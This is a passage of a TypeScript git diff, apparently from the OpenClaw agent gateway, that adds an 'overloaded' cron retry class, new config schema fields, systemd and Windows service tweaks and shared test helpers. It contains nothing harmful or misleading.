ok: true; - config: OpenClawConfig; - warnings: ConfigValidationIssue[]; - } - | { - ok: false; - issues: ConfigValidationIssue[]; - warnings: ConfigValidationIssue[]; - } { +export function validateConfigObjectRawWithPlugins(raw: unknown): ValidateConfigWithPluginsResult { return validateConfigObjectWithPluginsBase(raw, { applyDefaults: false }); } function validateConfigObjectWithPluginsBase( raw: unknown, opts: { applyDefaults: boolean }, -): - | { - ok: true; - config: OpenClawConfig; - warnings: ConfigValidationIssue[]; - } - | { - ok: false; - issues: ConfigValidationIssue[]; - warnings: ConfigValidationIssue[]; - } { +): ValidateConfigWithPluginsResult { const base = opts.applyDefaults ? validateConfigObject(raw) : validateConfigObjectRaw(raw); if (!base.ok) { return { ok: false, issues: base.issues, warnings: [] }; diff --git a/src/config/zod-schema.agent-defaults.ts b/src/config/zod-schema.agent-defaults.ts index 276f97f586d..7c43a5a382d 100644 --- a/src/config/zod-schema.agent-defaults.ts +++ b/src/config/zod-schema.agent-defaults.ts @@ -102,6 +102,7 @@ export const AgentDefaultsSchema = z }) .strict() .optional(), + postCompactionSections: z.array(z.string()).optional(), memoryFlush: z .object({ enabled: z.boolean().optional(), diff --git a/src/config/zod-schema.core.ts b/src/config/zod-schema.core.ts index 48c4429940b..733917e4dac 100644 --- a/src/config/zod-schema.core.ts +++ b/src/config/zod-schema.core.ts @@ -188,6 +188,7 @@ export const ModelCompatSchema = z supportsDeveloperRole: z.boolean().optional(), supportsReasoningEffort: z.boolean().optional(), supportsUsageInStreaming: z.boolean().optional(), + supportsTools: z.boolean().optional(), supportsStrictMode: z.boolean().optional(), maxTokensField: z .union([z.literal("max_completion_tokens"), z.literal("max_tokens")]) diff --git a/src/config/zod-schema.secret-input-validation.ts b/src/config/zod-schema.secret-input-validation.ts index f033b266889..3426e61d15f 100644 --- a/src/config/zod-schema.secret-input-validation.ts +++ b/src/config/zod-schema.secret-input-validation.ts @@ -25,6 +25,21 @@ type SlackConfigLike = { accounts?: Record; }; +function forEachEnabledAccount( + accounts: Record | undefined, + run: (accountId: string, account: T) => void, +): void { + if (!accounts) { + return; + } + for (const [accountId, account] of Object.entries(accounts)) { + if (!account || account.enabled === false) { + continue; + } + run(accountId, account); + } +} + export function validateTelegramWebhookSecretRequirements( value: TelegramConfigLike, ctx: z.RefinementCtx, @@ -38,20 +53,11 @@ export function validateTelegramWebhookSecretRequirements( path: ["webhookSecret"], }); } - if (!value.accounts) { - return; - } - for (const [accountId, account] of Object.entries(value.accounts)) { - if (!account) { - continue; - } - if (account.enabled === false) { - continue; - } + forEachEnabledAccount(value.accounts, (accountId, account) => { const accountWebhookUrl = typeof account.webhookUrl === "string" ? account.webhookUrl.trim() : ""; if (!accountWebhookUrl) { - continue; + return; } const hasAccountSecret = hasConfiguredSecretInput(account.webhookSecret); if (!hasAccountSecret && !hasBaseWebhookSecret) { @@ -62,7 +68,7 @@ export function validateTelegramWebhookSecretRequirements( path: ["accounts", accountId, "webhookSecret"], }); } - } + }); } export function validateSlackSigningSecretRequirements( @@ -77,20 +83,11 @@ export function validateSlackSigningSecretRequirements( path: ["signingSecret"], }); } - if (!value.accounts) { - return; - } - for (const [accountId, account] of Object.entries(value.accounts)) { - if (!account) { - continue; - } - if (account.enabled === false) { - continue; - } + forEachEnabledAccount(value.accounts, (accountId, account) => { const accountMode = account.mode === "http" || account.mode === "socket" ? account.mode : baseMode; if (accountMode !== "http") { - continue; + return; } const accountSecret = account.signingSecret ?? value.signingSecret; if (!hasConfiguredSecretInput(accountSecret)) { @@ -101,5 +98,5 @@ export function validateSlackSigningSecretRequirements( path: ["accounts", accountId, "signingSecret"], }); } - } + }); } diff --git a/src/config/zod-schema.ts b/src/config/zod-schema.ts index 033044238e8..5148704a1ac 100644 --- a/src/config/zod-schema.ts +++ b/src/config/zod-schema.ts @@ -423,6 +423,12 @@ export const OpenClawSchema = z media: z .object({ preserveFilenames: z.boolean().optional(), + ttlHours: z + .number() + .int() + .min(1) + .max(24 * 7) + .optional(), }) .strict() .optional(), @@ -440,7 +446,7 @@ export const OpenClawSchema = z maxAttempts: z.number().int().min(0).max(10).optional(), backoffMs: z.array(z.number().int().nonnegative()).min(1).max(10).optional(), retryOn: z - .array(z.enum(["rate_limit", "network", "timeout", "server_error"])) + .array(z.enum(["rate_limit", "overloaded", "network", "timeout", "server_error"])) .min(1) .optional(), }) diff --git a/src/context-engine/legacy.ts b/src/context-engine/legacy.ts index ba05c9e8b8d..ab2eeff9b7f 100644 --- a/src/context-engine/legacy.ts +++ b/src/context-engine/legacy.ts @@ -69,9 +69,9 @@ export class LegacyContextEngine implements ContextEngine { customInstructions?: string; legacyParams?: Record; }): Promise { - // Import dynamically to avoid circular dependencies + // Import through a dedicated runtime boundary so the lazy edge remains effective. const { compactEmbeddedPiSessionDirect } = - await import("../agents/pi-embedded-runner/compact.js"); + await import("../agents/pi-embedded-runner/compact.runtime.js"); // legacyParams carries the full CompactEmbeddedPiSessionParams fields // set by the caller in run.ts. We spread them and override the fields diff --git a/src/cron/isolated-agent.skips-delivery-without-whatsapp-recipient-besteffortdeliver-true.test.ts b/src/cron/isolated-agent.skips-delivery-without-whatsapp-recipient-besteffortdeliver-true.test.ts index e9dceba6365..bc763a7a588 100644 --- a/src/cron/isolated-agent.skips-delivery-without-whatsapp-recipient-besteffortdeliver-true.test.ts +++ b/src/cron/isolated-agent.skips-delivery-without-whatsapp-recipient-besteffortdeliver-true.test.ts @@ -1,8 +1,6 @@ import "./isolated-agent.mocks.js"; import fs from "node:fs/promises"; -import os from "node:os"; -import path from "node:path"; -import { afterAll, beforeAll, beforeEach, describe, expect, it, vi } from "vitest"; +import { beforeEach, describe, expect, it, vi } from "vitest"; import { runSubagentAnnounceFlow } from "../agents/subagent-announce.js"; import type { CliDeps } from "../cli/deps.js"; import { @@ -12,72 +10,15 @@ import { runTelegramAnnounceTurn, } from "./isolated-agent.delivery.test-helpers.js"; import { runCronIsolatedAgentTurn } from "./isolated-agent.js"; -import { makeCfg, makeJob, writeSessionStore } from "./isolated-agent.test-harness.js"; +import { + makeCfg, + makeJob, + withTempCronHome as withTempHome, + writeSessionStore, +} from "./isolated-agent.test-harness.js"; import { setupIsolatedAgentTurnMocks } from "./isolated-agent.test-setup.js"; -type HomeEnvSnapshot = { - HOME: string | undefined; - USERPROFILE: string | undefined; - HOMEDRIVE: string | undefined; - HOMEPATH: string | undefined; - OPENCLAW_HOME: string | undefined; - OPENCLAW_STATE_DIR: string | undefined; -}; - const TELEGRAM_TARGET = { mode: "announce", channel: "telegram", to: "123" } as const; -let suiteTempHomeRoot = ""; -let suiteTempHomeCaseId = 0; - -function snapshotHomeEnv(): HomeEnvSnapshot { - return { - HOME: process.env.HOME, - USERPROFILE: process.env.USERPROFILE, - HOMEDRIVE: process.env.HOMEDRIVE, - HOMEPATH: process.env.HOMEPATH, - OPENCLAW_HOME: process.env.OPENCLAW_HOME, - OPENCLAW_STATE_DIR: process.env.OPENCLAW_STATE_DIR, - }; -} - -function restoreHomeEnv(snapshot: HomeEnvSnapshot) { - const restoreValue = (key: keyof HomeEnvSnapshot) => { - const value = snapshot[key]; - if (value === undefined) { - delete process.env[key]; - } else { - process.env[key] = value; - } - }; - restoreValue("HOME"); - restoreValue("USERPROFILE"); - restoreValue("HOMEDRIVE"); - restoreValue("HOMEPATH"); - restoreValue("OPENCLAW_HOME"); - restoreValue("OPENCLAW_STATE_DIR"); -} - -async function withTempHome(fn: (home: string) => Promise): Promise { - const home = path.join(suiteTempHomeRoot, `case-${suiteTempHomeCaseId++}`); - await fs.mkdir(path.join(home, ".openclaw", "agents", "main", "sessions"), { recursive: true }); - const snapshot = snapshotHomeEnv(); - process.env.HOME = home; - process.env.USERPROFILE = home; - delete process.env.OPENCLAW_HOME; - process.env.OPENCLAW_STATE_DIR = path.join(home, ".openclaw"); - if (process.platform === "win32") { - const parsed = path.parse(home); - if (parsed.root) { - process.env.HOMEDRIVE = parsed.root.replace(/[\\/]+$/, ""); - process.env.HOMEPATH = home.slice(process.env.HOMEDRIVE.length) || "\\"; - } - } - try { - return await fn(home); - } finally { - restoreHomeEnv(snapshot); - } -} - async function runExplicitTelegramAnnounceTurn(params: { home: string; storePath: string; @@ -264,19 +205,6 @@ async function assertExplicitTelegramTargetAnnounce(params: { } describe("runCronIsolatedAgentTurn", () => { - beforeAll(async () => { - suiteTempHomeRoot = await fs.mkdtemp(path.join(os.tmpdir(), "openclaw-cron-delivery-suite-")); - }); - - afterAll(async () => { - if (!suiteTempHomeRoot) { - return; - } - await fs.rm(suiteTempHomeRoot, { recursive: true, force: true }); - suiteTempHomeRoot = ""; - suiteTempHomeCaseId = 0; - }); - beforeEach(() => { setupIsolatedAgentTurnMocks(); }); diff --git a/src/cron/isolated-agent.uses-last-non-empty-agent-text-as.test.ts b/src/cron/isolated-agent.uses-last-non-empty-agent-text-as.test.ts index 2ef6df271d5..2a4b786f99c 100644 --- a/src/cron/isolated-agent.uses-last-non-empty-agent-text-as.test.ts +++ b/src/cron/isolated-agent.uses-last-non-empty-agent-text-as.test.ts @@ -1,8 +1,7 @@ import "./isolated-agent.mocks.js"; import fs from "node:fs/promises"; -import os from "node:os"; import path from "node:path"; -import { afterAll, beforeAll, beforeEach, describe, expect, it, vi } from "vitest"; +import { beforeEach, describe, expect, it, vi } from "vitest"; import { loadModelCatalog } from "../agents/model-catalog.js"; import { runEmbeddedPiAgent } from "../agents/pi-embedded.js"; import type { CliDeps } from "../cli/deps.js"; @@ -10,73 +9,12 @@ import { runCronIsolatedAgentTurn } from "./isolated-agent.js"; import { makeCfg, makeJob, + withTempCronHome as withTempHome, writeSessionStore, writeSessionStoreEntries, } from "./isolated-agent.test-harness.js"; import type { CronJob } from "./types.js"; -type HomeEnvSnapshot = { - HOME: string | undefined; - USERPROFILE: string | undefined; - HOMEDRIVE: string | undefined; - HOMEPATH: string | undefined; - OPENCLAW_HOME: string | undefined; - OPENCLAW_STATE_DIR: string | undefined; -}; - -let suiteTempHomeRoot = ""; -let suiteTempHomeCaseId = 0; - -function snapshotHomeEnv(): HomeEnvSnapshot { - return { - HOME: process.env.HOME, - USERPROFILE: process.env.USERPROFILE, - HOMEDRIVE: process.env.HOMEDRIVE, - HOMEPATH: process.env.HOMEPATH, - OPENCLAW_HOME: process.env.OPENCLAW_HOME, - OPENCLAW_STATE_DIR: process.env.OPENCLAW_STATE_DIR, - }; -} - -function restoreHomeEnv(snapshot: HomeEnvSnapshot) { - const restoreValue = (key: keyof HomeEnvSnapshot) => { - const value = snapshot[key]; - if (value === undefined) { - delete process.env[key]; - } else { - process.env[key] = value; - } - }; - restoreValue("HOME"); - restoreValue("USERPROFILE"); - restoreValue("HOMEDRIVE"); - restoreValue("HOMEPATH"); - restoreValue("OPENCLAW_HOME"); - restoreValue("OPENCLAW_STATE_DIR"); -} - -async function withTempHome(fn: (home: string) => Promise): Promise { - const home = path.join(suiteTempHomeRoot, `case-${suiteTempHomeCaseId++}`); - await fs.mkdir(path.join(home, ".openclaw", "agents", "main", "sessions"), { recursive: true }); - const snapshot = snapshotHomeEnv(); - process.env.HOME = home; - process.env.USERPROFILE = home; - delete process.env.OPENCLAW_HOME; - process.env.OPENCLAW_STATE_DIR = path.join(home, ".openclaw"); - if (process.platform === "win32") { - const parsed = path.parse(home); - if (parsed.root) { - process.env.HOMEDRIVE = parsed.root.replace(/[\\/]+$/, ""); - process.env.HOMEPATH = home.slice(process.env.HOMEDRIVE.length) || "\\"; - } - } - try { - return await fn(home); - } finally { - restoreHomeEnv(snapshot); - } -} - function makeDeps(): CliDeps { return { sendMessageSlack: vi.fn(), @@ -224,19 +162,6 @@ async function runStoredOverrideAndExpectModel(params: { } describe("runCronIsolatedAgentTurn", () => { - beforeAll(async () => { - suiteTempHomeRoot = await fs.mkdtemp(path.join(os.tmpdir(), "openclaw-cron-turn-suite-")); - }); - - afterAll(async () => { - if (!suiteTempHomeRoot) { - return; - } - await fs.rm(suiteTempHomeRoot, { recursive: true, force: true }); - suiteTempHomeRoot = ""; - suiteTempHomeCaseId = 0; - }); - beforeEach(() => { vi.mocked(runEmbeddedPiAgent).mockClear(); vi.mocked(loadModelCatalog).mockResolvedValue([]); diff --git a/src/cron/isolated-agent/run.ts b/src/cron/isolated-agent/run.ts index 1fbcc08bad8..8d5a1db73a5 100644 --- a/src/cron/isolated-agent/run.ts +++ b/src/cron/isolated-agent/run.ts @@ -534,7 +534,7 @@ export async function runCronIsolatedAgentTurn(params: { // be blocked by a target it cannot satisfy (#27898). requireExplicitMessageTarget: deliveryRequested && resolvedDelivery.ok, disableMessageTool: deliveryRequested || deliveryPlan.mode === "none", - allowRateLimitCooldownProbe: runOptions?.allowRateLimitCooldownProbe, + allowTransientCooldownProbe: runOptions?.allowTransientCooldownProbe, abortSignal, bootstrapPromptWarningSignaturesSeen, bootstrapPromptWarningSignature, diff --git a/src/cron/isolated-agent/session.test.ts b/src/cron/isolated-agent/session.test.ts index 08f273e8c41..fc75ed100f6 100644 --- a/src/cron/isolated-agent/session.test.ts +++ b/src/cron/isolated-agent/session.test.ts @@ -1,4 +1,4 @@ -import { describe, expect, it, vi } from "vitest"; +import { beforeEach, describe, expect, it, vi } from "vitest"; import type { OpenClawConfig } from "../../config/config.js"; vi.mock("../../config/sessions.js", () => ({ @@ -8,6 +8,16 @@ vi.mock("../../config/sessions.js", () => ({ resolveSessionResetPolicy: vi.fn().mockReturnValue({ mode: "idle", idleMinutes: 60 }), })); +vi.mock("../../agents/bootstrap-cache.js", () => ({ + clearBootstrapSnapshot: vi.fn(), + clearBootstrapSnapshotOnSessionRollover: vi.fn(({ sessionKey, previousSessionId }) => { + if (sessionKey && previousSessionId) { + clearBootstrapSnapshot(sessionKey); + } + }), +})); + +import { clearBootstrapSnapshot } from "../../agents/bootstrap-cache.js"; import { loadSessionStore, evaluateSessionFreshness } from "../../config/sessions.js"; import { resolveCronSession } from "./session.js"; @@ -40,6 +50,10 @@ function resolveWithStoredEntry(params?: { } describe("resolveCronSession", () => { + beforeEach(() => { + vi.mocked(clearBootstrapSnapshot).mockReset(); + }); + it("preserves modelOverride and providerOverride from existing session entry", () => { const result = resolveWithStoredEntry({ sessionKey: "agent:main:cron:test-job", @@ -100,6 +114,7 @@ describe("resolveCronSession", () => { expect(result.sessionEntry.sessionId).toBe("existing-session-id-123"); expect(result.isNewSession).toBe(false); expect(result.systemSent).toBe(true); + expect(clearBootstrapSnapshot).not.toHaveBeenCalled(); }); it("creates new sessionId when session is stale", () => { @@ -121,6 +136,7 @@ describe("resolveCronSession", () => { expect(result.sessionEntry.modelOverride).toBe("gpt-4.1-mini"); expect(result.sessionEntry.providerOverride).toBe("openai"); expect(result.sessionEntry.sendPolicy).toBe("allow"); + expect(clearBootstrapSnapshot).toHaveBeenCalledWith("webhook:stable-key"); }); it("creates new sessionId when forceNew is true", () => { @@ -141,6 +157,7 @@ describe("resolveCronSession", () => { expect(result.systemSent).toBe(false); expect(result.sessionEntry.modelOverride).toBe("sonnet-4"); expect(result.sessionEntry.providerOverride).toBe("anthropic"); + expect(clearBootstrapSnapshot).toHaveBeenCalledWith("webhook:stable-key"); }); it("clears delivery routing metadata and deliveryContext when forceNew is true", () => { diff --git a/src/cron/isolated-agent/session.ts b/src/cron/isolated-agent/session.ts index b1c9fe3710d..c7bde5cea2d 100644 --- a/src/cron/isolated-agent/session.ts +++ b/src/cron/isolated-agent/session.ts @@ -1,4 +1,5 @@ import crypto from "node:crypto"; +import { clearBootstrapSnapshotOnSessionRollover } from "../../agents/bootstrap-cache.js"; import type { OpenClawConfig } from "../../config/config.js"; import { evaluateSessionFreshness, @@ -58,6 +59,11 @@ export function resolveCronSession(params: { systemSent = false; } + clearBootstrapSnapshotOnSessionRollover({ + sessionKey: params.sessionKey, + previousSessionId: isNewSession ? entry?.sessionId : undefined, + }); + const sessionEntry: SessionEntry = { // Preserve existing per-session overrides even when rolling to a new sessionId. ...entry, diff --git a/src/cron/service.issue-regressions.test.ts b/src/cron/service.issue-regressions.test.ts index 9665d40ec55..9aec71b7315 100644 --- a/src/cron/service.issue-regressions.test.ts +++ b/src/cron/service.issue-regressions.test.ts @@ -580,6 +580,7 @@ describe("Cron issue regressions", () => { const runRetryScenario = async (params: { id: string; deleteAfterRun: boolean; + firstError?: string; }): Promise<{ state: ReturnType; runIsolatedAgentJob: ReturnType; @@ -600,7 +601,10 @@ describe("Cron issue regressions", () => { let now = scheduledAt; const runIsolatedAgentJob = vi .fn() - .mockResolvedValueOnce({ status: "error", error: "429 rate limit exceeded" }) + .mockResolvedValueOnce({ + status: "error", + error: params.firstError ?? "429 rate limit exceeded", + }) .mockResolvedValueOnce({ status: "ok", summary: "done" }); const state = createCronServiceState({ cronEnabled: true, @@ -644,6 +648,19 @@ describe("Cron issue regressions", () => { ); expect(deletedJob).toBeUndefined(); expect(deleteResult.runIsolatedAgentJob).toHaveBeenCalledTimes(2); + + const overloadedResult = await runRetryScenario({ + id: "oneshot-overloaded-retry", + deleteAfterRun: false, + firstError: + "All models failed (2): anthropic/claude-3-5-sonnet: LLM error overloaded_error: overloaded (overloaded); openai/gpt-5.3-codex: LLM error overloaded_error: overloaded (overloaded)", + }); + const overloadedJob = overloadedResult.state.store?.jobs.find( + (j) => j.id === "oneshot-overloaded-retry", + ); + expect(overloadedJob).toBeDefined(); + expect(overloadedJob!.state.lastStatus).toBe("ok"); + expect(overloadedResult.runIsolatedAgentJob).toHaveBeenCalledTimes(2); }); it("#24355: one-shot job disabled after max transient retries", async () => { @@ -735,6 +752,54 @@ describe("Cron issue regressions", () => { expect(runIsolatedAgentJob).toHaveBeenCalledTimes(3); }); + it("#24355: one-shot job retries status-only 529 failures when retryOn only includes overloaded", async () => { + const store = makeStorePath(); + const scheduledAt = Date.parse("2026-02-06T10:00:00.000Z"); + + const cronJob = createIsolatedRegressionJob({ + id: "oneshot-overloaded-529-only", + name: "reminder", + scheduledAt, + schedule: { kind: "at", at: new Date(scheduledAt).toISOString() }, + payload: { kind: "agentTurn", message: "remind me" }, + state: { nextRunAtMs: scheduledAt }, + }); + await writeCronJobs(store.storePath, [cronJob]); + + let now = scheduledAt; + const runIsolatedAgentJob = vi + .fn() + .mockResolvedValueOnce({ status: "error", error: "FailoverError: HTTP 529" }) + .mockResolvedValueOnce({ status: "ok", summary: "done" }); + const state = createCronServiceState({ + cronEnabled: true, + storePath: store.storePath, + log: noopLogger, + nowMs: () => now, + enqueueSystemEvent: vi.fn(), + requestHeartbeatNow: vi.fn(), + runIsolatedAgentJob, + cronConfig: { + retry: { maxAttempts: 1, backoffMs: [1000], retryOn: ["overloaded"] }, + }, + }); + + await onTimer(state); + const jobAfterRetry = state.store?.jobs.find((j) => j.id === "oneshot-overloaded-529-only"); + expect(jobAfterRetry).toBeDefined(); + expect(jobAfterRetry!.enabled).toBe(true); + expect(jobAfterRetry!.state.lastStatus).toBe("error"); + expect(jobAfterRetry!.state.nextRunAtMs).toBeGreaterThan(scheduledAt); + + now = (jobAfterRetry!.state.nextRunAtMs ?? now) + 1; + await onTimer(state); + + const finishedJob = state.store?.jobs.find((j) => j.id === "oneshot-overloaded-529-only"); + expect(finishedJob).toBeDefined(); + expect(finishedJob!.state.lastStatus).toBe("ok"); + expect(runIsolatedAgentJob).toHaveBeenCalledTimes(2); + }); + it("#24355: one-shot job disabled immediately on permanent error", async () => { const store = makeStorePath(); const scheduledAt = Date.parse("2026-02-06T10:00:00.000Z"); diff --git a/src/cron/service/timer.ts b/src/cron/service/timer.ts index 8d1d40024ed..8502f3b6fe8 100644 --- a/src/cron/service/timer.ts +++ b/src/cron/service/timer.ts @@ -120,6 +120,8 @@ const DEFAULT_MAX_TRANSIENT_RETRIES = 3; const TRANSIENT_PATTERNS: Record = { rate_limit: /(rate[_ ]limit|too many requests|429|resource has been exhausted|cloudflare)/i, + overloaded: + /\b529\b|\boverloaded(?:_error)?\b|high demand|temporar(?:ily|y) overloaded|capacity exceeded/i, network: /(network|econnreset|econnrefused|fetch failed|socket)/i, timeout: /(timeout|etimedout)/i, server_error: /\b5\d{2}\b/, diff --git a/src/cron/session-reaper.ts b/src/cron/session-reaper.ts index fa12caa2f56..dd0094d4c57 100644 --- a/src/cron/session-reaper.ts +++ b/src/cron/session-reaper.ts @@ -6,14 +6,14 @@ * run records. The base session (`...:cron:`) is kept as-is. */ -import path from "node:path"; import { parseDurationMs } from "../cli/parse-duration.js"; -import { loadSessionStore, updateSessionStore } from "../config/sessions.js"; -import type { CronConfig } from "../config/types.cron.js"; import { - archiveSessionTranscripts, - cleanupArchivedSessionTranscripts, -} from "../gateway/session-utils.fs.js"; + archiveRemovedSessionTranscripts, + loadSessionStore, + updateSessionStore, +} from "../config/sessions.js"; +import type { CronConfig } from "../config/types.cron.js"; +import { cleanupArchivedSessionTranscripts } from "../gateway/session-utils.fs.js"; import { isCronRunSessionKey } from "../sessions/session-key-utils.js"; import type { Logger } from "./service/state.js"; @@ -116,22 +116,13 @@ export async function sweepCronRunSessions(params: { .map((entry) => entry?.sessionId) .filter((id): id is string => Boolean(id)), ); - const archivedDirs = new Set(); - for (const [sessionId, sessionFile] of prunedSessions) { - if (referencedSessionIds.has(sessionId)) { - continue; - } - const archived = archiveSessionTranscripts({ - sessionId, - storePath, - sessionFile, - reason: "deleted", - restrictToStoreDir: true, - }); - for (const archivedPath of archived) { - archivedDirs.add(path.dirname(archivedPath)); - } - } + const archivedDirs = archiveRemovedSessionTranscripts({ + removedSessionFiles: prunedSessions, + referencedSessionIds, + storePath, + reason: "deleted", + restrictToStoreDir: true, + }); if (archivedDirs.size > 0) { await cleanupArchivedSessionTranscripts({ directories: [...archivedDirs], diff --git a/src/daemon/service-env.test.ts b/src/daemon/service-env.test.ts index 4080cd88fcf..f1dcb6e6f6f 100644 --- a/src/daemon/service-env.test.ts +++ b/src/daemon/service-env.test.ts @@ -278,6 +278,7 @@ describe("buildServiceEnvironment", () => { expect(env.OPENCLAW_SERVICE_KIND).toBe("gateway"); expect(typeof env.OPENCLAW_SERVICE_VERSION).toBe("string"); expect(env.OPENCLAW_SYSTEMD_UNIT).toBe("openclaw-gateway.service"); + expect(env.OPENCLAW_WINDOWS_TASK_NAME).toBe("OpenClaw Gateway"); if (process.platform === "darwin") { expect(env.OPENCLAW_LAUNCHD_LABEL).toBe("ai.openclaw.gateway"); } @@ -305,6 +306,7 @@ describe("buildServiceEnvironment", () => { port: 18789, }); expect(env.OPENCLAW_SYSTEMD_UNIT).toBe("openclaw-gateway-work.service"); + expect(env.OPENCLAW_WINDOWS_TASK_NAME).toBe("OpenClaw Gateway (work)"); if (process.platform === "darwin") { expect(env.OPENCLAW_LAUNCHD_LABEL).toBe("ai.openclaw.work"); } diff --git a/src/daemon/service-env.ts b/src/daemon/service-env.ts index f0534746aa7..181e45a7590 100644 --- a/src/daemon/service-env.ts +++ b/src/daemon/service-env.ts @@ -6,6 +6,7 @@ import { GATEWAY_SERVICE_MARKER, resolveGatewayLaunchAgentLabel, resolveGatewaySystemdServiceName, + resolveGatewayWindowsTaskName, NODE_SERVICE_KIND, NODE_SERVICE_MARKER, NODE_WINDOWS_TASK_SCRIPT_NAME, @@ -262,6 +263,7 @@ export function buildServiceEnvironment(params: { OPENCLAW_GATEWAY_TOKEN: token, OPENCLAW_LAUNCHD_LABEL: resolvedLaunchdLabel, OPENCLAW_SYSTEMD_UNIT: systemdUnit, + OPENCLAW_WINDOWS_TASK_NAME: resolveGatewayWindowsTaskName(profile), OPENCLAW_SERVICE_MARKER: GATEWAY_SERVICE_MARKER, OPENCLAW_SERVICE_KIND: GATEWAY_SERVICE_KIND, OPENCLAW_SERVICE_VERSION: VERSION, diff --git a/src/daemon/systemd.test.ts b/src/daemon/systemd.test.ts index 71bfef54d6d..9fc8283b84a 100644 --- a/src/daemon/systemd.test.ts +++ b/src/daemon/systemd.test.ts @@ -1,3 +1,4 @@ +import fs from "node:fs/promises"; import { beforeEach, describe, expect, it, vi } from "vitest"; const execFileMock = vi.hoisted(() => vi.fn()); @@ -66,44 +67,65 @@ describe("systemd availability", () => { }); describe("isSystemdServiceEnabled", () => { + const mockManagedUnitPresent = () => { + vi.spyOn(fs, "access").mockResolvedValue(undefined); + }; + beforeEach(() => { + vi.restoreAllMocks(); execFileMock.mockReset(); }); it("returns false when systemctl is not present", async () => { const { isSystemdServiceEnabled } = await import("./systemd.js"); + mockManagedUnitPresent(); execFileMock.mockImplementation((_cmd, _args, _opts, cb) => { const err = new Error("spawn systemctl EACCES") as Error & { code?: string }; err.code = "EACCES"; cb(err, "", ""); }); - const result = await isSystemdServiceEnabled({ env: {} }); + const result = await isSystemdServiceEnabled({ env: { HOME: "/tmp/openclaw-test-home" } }); expect(result).toBe(false); }); + it("returns false without calling systemctl when the managed unit file is missing", async () => { + const { isSystemdServiceEnabled } = await import("./systemd.js"); + const err = new Error("missing unit") as NodeJS.ErrnoException; + err.code = "ENOENT"; + vi.spyOn(fs, "access").mockRejectedValueOnce(err); + + const result = await isSystemdServiceEnabled({ env: { HOME: "/tmp/openclaw-test-home" } }); + + expect(result).toBe(false); + expect(execFileMock).not.toHaveBeenCalled(); + }); + it("calls systemctl is-enabled when systemctl is present", async () => { const { isSystemdServiceEnabled } = await import("./systemd.js"); + mockManagedUnitPresent(); execFileMock.mockImplementationOnce((_cmd, args, _opts, cb) => { expect(args).toEqual(["--user", "is-enabled", "openclaw-gateway.service"]); cb(null, "enabled", ""); }); - const result = await isSystemdServiceEnabled({ env: {} }); + const result = await isSystemdServiceEnabled({ env: { HOME: "/tmp/openclaw-test-home" } }); expect(result).toBe(true); }); it("returns false when systemctl reports disabled", async () => { const { isSystemdServiceEnabled } = await import("./systemd.js"); + mockManagedUnitPresent(); execFileMock.mockImplementationOnce((_cmd, _args, _opts, cb) => { const err = new Error("disabled") as Error & { code?: number }; err.code = 1; cb(err, "disabled", ""); }); - const result = await isSystemdServiceEnabled({ env: {} }); + const result = await isSystemdServiceEnabled({ env: { HOME: "/tmp/openclaw-test-home" } }); expect(result).toBe(false); }); it("throws when systemctl is-enabled fails for non-state errors", async () => { const { isSystemdServiceEnabled } = await import("./systemd.js"); + mockManagedUnitPresent(); execFileMock .mockImplementationOnce((_cmd, args, _opts, cb) => { expect(args).toEqual(["--user", "is-enabled", "openclaw-gateway.service"]); @@ -119,13 +141,14 @@ describe("isSystemdServiceEnabled", () => { err.code = 1; cb(err, "", "permission denied"); }); - await expect(isSystemdServiceEnabled({ env: {} })).rejects.toThrow( - "systemctl is-enabled unavailable: permission denied", - ); + await expect( + isSystemdServiceEnabled({ env: { HOME: "/tmp/openclaw-test-home" } }), + ).rejects.toThrow("systemctl is-enabled unavailable: permission denied"); }); it("returns false when systemctl is-enabled exits with code 4 (not-found)", async () => { const { isSystemdServiceEnabled } = await import("./systemd.js"); + mockManagedUnitPresent(); execFileMock.mockImplementationOnce((_cmd, _args, _opts, cb) => { // On Ubuntu 24.04, `systemctl --user is-enabled ` exits with // code 4 and prints "not-found" to stdout when the unit doesn't exist. @@ -135,7 +158,7 @@ describe("isSystemdServiceEnabled", () => { err.code = 4; cb(err, "not-found\n", ""); }); - const result = await isSystemdServiceEnabled({ env: {} }); + const result = await isSystemdServiceEnabled({ env: { HOME: "/tmp/openclaw-test-home" } }); expect(result).toBe(false); }); }); diff --git a/src/daemon/systemd.ts b/src/daemon/systemd.ts index 08353048c59..9d8849a2ba5 100644 --- a/src/daemon/systemd.ts +++ b/src/daemon/systemd.ts @@ -423,7 +423,16 @@ export async function restartSystemdService({ export async function isSystemdServiceEnabled(args: GatewayServiceEnvArgs): Promise { const env = args.env ?? process.env; - const serviceName = resolveSystemdServiceName(args.env ?? {}); + try { + await fs.access(resolveSystemdUnitPath(env)); + } catch (error) { + if ((error as NodeJS.ErrnoException).code === "ENOENT") { + return false; + } + throw error; + } + + const serviceName = resolveSystemdServiceName(env); const unitName = `${serviceName}.service`; const res = await execSystemctlUser(env, ["is-enabled", unitName]); if (res.code === 0) { diff --git a/src/discord/monitor/auto-presence.test.ts b/src/discord/monitor/auto-presence.test.ts index 0065ed77be7..b5a83d5242d 100644 --- a/src/discord/monitor/auto-presence.test.ts +++ b/src/discord/monitor/auto-presence.test.ts @@ -50,6 +50,26 @@ describe("discord auto presence", () => { expect(decision?.presence.activities[0]?.state).toBe("token exhausted"); }); + it("treats overloaded cooldown as exhausted", () => { + const now = Date.now(); + const decision = resolveDiscordAutoPresenceDecision({ + discordConfig: { + autoPresence: { + enabled: true, + exhaustedText: "token exhausted", + }, + }, + authStore: createStore({ cooldownUntil: now + 60_000, failureCounts: { overloaded: 2 } }), + gatewayConnected: true, + now, + }); + + expect(decision).toBeTruthy(); + expect(decision?.state).toBe("exhausted"); + expect(decision?.presence.status).toBe("dnd"); + expect(decision?.presence.activities[0]?.state).toBe("token exhausted"); + }); + it("recovers from exhausted to online once a profile becomes usable", () => { let now = Date.now(); let store = createStore({ cooldownUntil: now + 60_000, failureCounts: { rate_limit: 1 } }); diff --git a/src/discord/monitor/auto-presence.ts b/src/discord/monitor/auto-presence.ts index 74bdcab3617..8c139382dc6 100644 --- a/src/discord/monitor/auto-presence.ts +++ b/src/discord/monitor/auto-presence.ts @@ -104,6 +104,7 @@ function isExhaustedUnavailableReason(reason: AuthProfileFailureReason | null): } return ( reason === "rate_limit" || + reason === "overloaded" || reason === "billing" || reason === "auth" || reason === "auth_permanent" diff --git a/src/discord/monitor/message-handler.preflight.test.ts b/src/discord/monitor/message-handler.preflight.test.ts index 9a2fb11eebf..ac2ab57e283 100644 --- a/src/discord/monitor/message-handler.preflight.test.ts +++ b/src/discord/monitor/message-handler.preflight.test.ts @@ -21,6 +21,12 @@ import { createThreadBindingManager, } from 